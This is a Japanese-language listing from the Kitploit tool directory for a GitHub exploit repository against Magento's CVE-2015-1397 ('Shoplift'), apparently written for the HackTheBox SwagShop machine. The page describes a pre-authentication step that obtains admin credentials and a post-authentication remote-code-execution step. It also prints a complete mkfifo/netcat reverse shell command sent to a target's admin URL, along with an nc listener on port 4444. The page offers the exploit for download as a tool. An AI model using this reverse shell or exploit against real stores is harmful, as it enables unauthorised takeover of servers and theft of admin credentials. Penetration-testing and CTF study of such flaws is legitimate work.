Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2015-1397-Magento-Shoplift — Magento CMSのCVE-2015-1397のエクスプロイトスクリプト。管理者資格情報を取得する事前認証エクスプロイトと、リバースシェル実行のための認証後RCEモジュールを含む。 | Kitploit
ツール/GitHubGitHub/wytchwulf/cve-2015-1397-magento-shoplift
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用CTFペネトレーションテスト
GitHubwytchwulf/cve-2015-1397-magento-shoplift

CVE-2015-1397-Magento-Shoplift

Magento CMSのCVE-2015-1397のエクスプロイトスクリプト。管理者資格情報を取得する事前認証エクスプロイトと、リバースシェル実行のための認証後RCEモジュールを含む。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
12年前未レビュー

CVE-2015-1397-Magento-Shoplift

脆弱性の詳細

HackTheBox - SwagShop で確認された脆弱性

ステージ1 = exploit.py

Magento CMS ダッシュボードへの管理者認証情報を取得する

ステージ2 = post_auth.py

exploit.py から取得した認証情報を post_auth.py に追加して実行:

root@kitploit:~
python3 post_auth.py http://TARGET.SITE/index.php/admin "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc YOUR_IP 4444 >/tmp/f"

リスナー:

root@kitploit:~
nc -lvnp 4444
ツールをダウンロード